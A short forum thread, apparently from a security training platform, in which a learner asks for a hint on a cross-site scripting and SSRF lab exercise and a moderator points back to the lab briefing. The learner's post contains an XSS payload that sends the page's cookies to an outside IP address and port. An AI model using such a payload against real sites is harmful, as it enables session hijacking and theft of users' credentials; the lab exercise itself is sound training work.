Forum Discussion

Bronze I

3 months ago

Cross-Site Scripting: Ep.6 – Further Exploitation

I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.

Bronze I

Thanks for welcome.

So I tire using netcat with the payload in message to make a reverse connection

Payload:<img src=xss onload="this.src='http://10.102.181.168:5556/admin/token?'+document.cookie;this.removeAttribute('onerror');"/>

Immerser

2 months ago

Hi shubham 👋 have another look at the "XSS and SSRF" section of the Briefing panel. You'll need to use a different payload than this.